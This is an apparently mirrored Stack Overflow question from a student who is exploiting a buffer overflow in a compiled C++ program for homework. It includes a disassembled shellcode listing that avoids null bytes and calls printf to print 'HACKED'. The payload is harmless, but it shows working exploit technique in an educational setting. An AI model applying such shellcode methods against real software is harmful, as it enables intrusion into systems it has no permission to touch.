Printf in assembler doesn't print
Posted
by Gaim
on Stack Overflow
See other posts from Stack Overflow
or by Gaim
Published on 2010-04-27T06:45:14Z
Indexed on
2010/04/27
7:53 UTC
Read the original article
Hit count: 353
Hi there, I have got a homework to hack program using buffer overflow ( with disassambling, program was written in C++, I haven't got the source code ). I have already managed it but I have a problem. I have to print some message on the screen, so I found out address of printf function, pushed address of "HACKED" and address of "%s" on the stack ( in this order ) and called that function. Called code passed well but nothing had been printed.
I have tried to simulate the environment like in other place in the program but there has to be something wrong. Do you have any idea what I am doing wrong that I have no output, please? Thanks a lot
EDIT:
This program is running on Windows XP SP3 32b, written in C++, Intel asm
there is the "hack" code
CPU Disasm
Address Hex dump Command Comments
0012F9A3 90 NOP ;hack begins
0012F9A4 90 NOP
0012F9A5 90 NOP
0012F9A6 89E5 MOV EBP,ESP
0012F9A8 83EC 7F SUB ESP,7F ;creating a place for working data
0012F9AB 83EC 7F SUB ESP,7F
0012F9AE 31C0 XOR EAX,EAX
0012F9B0 50 PUSH EAX
0012F9B1 50 PUSH EAX
0012F9B2 50 PUSH EAX
0012F9B3 89E8 MOV EAX,EBP
0012F9B5 83E8 09 SUB EAX,9
0012F9B8 BA 1406EDFF MOV EDX,FFED0614 ;address to jump, it is negative because there mustn't be 00 bytes
0012F9BD F7DA NOT EDX
0012F9BF FFE2 JMP EDX ;I have to jump because there are some values overwritten by the program
0012F9C1 90 NOP
0012F9C2 0090 00000000 ADD BYTE PTR DS:[EAX],DL
0012F9C8 90 NOP
0012F9C9 90 NOP
0012F9CA 90 NOP
0012F9CB 90 NOP
0012F9CC 6C INS BYTE PTR ES:[EDI],DX ; I/O command
0012F9CD 65:6E OUTS DX,BYTE PTR GS:[ESI] ; I/O command
0012F9CF 67:74 68 JE SHORT 0012FA3A ; Superfluous address size prefix
0012F9D2 2069 73 AND BYTE PTR DS:[ECX+73],CH
0012F9D5 203439 AND BYTE PTR DS:[EDI+ECX],DH
0012F9D8 34 2C XOR AL,2C
0012F9DA 2066 69 AND BYTE PTR DS:[ESI+69],AH
0012F9DD 72 73 JB SHORT 0012FA52
0012F9DF 74 20 JE SHORT 0012FA01
0012F9E1 3120 XOR DWORD PTR DS:[EAX],ESP
0012F9E3 6C INS BYTE PTR ES:[EDI],DX ; I/O command
0012F9E4 696E 65 7300909 IMUL EBP,DWORD PTR DS:[ESI+65],-6F6FFF8D
0012F9EB 90 NOP
0012F9EC 90 NOP
0012F9ED 90 NOP
0012F9EE 31DB XOR EBX,EBX ; hack continues
0012F9F0 8818 MOV BYTE PTR DS:[EAX],BL ; writing 00 behind word "HACKED"
0012F9F2 83E8 06 SUB EAX,6
0012F9F5 50 PUSH EAX ; address of "HACKED"
0012F9F6 B8 3B8CBEFF MOV EAX,FFBE8C3B
0012F9FB F7D0 NOT EAX
0012F9FD 50 PUSH EAX ; address of "%s"
0012F9FE B8 FFE4BFFF MOV EAX,FFBFE4FF
0012FA03 F7D0 NOT EAX
0012FA05 FFD0 CALL EAX ;address of printf
This code is really ugly because I am new in assembler and there mustn't be null bytes because of buffer-overflow bug
© Stack Overflow or respective owner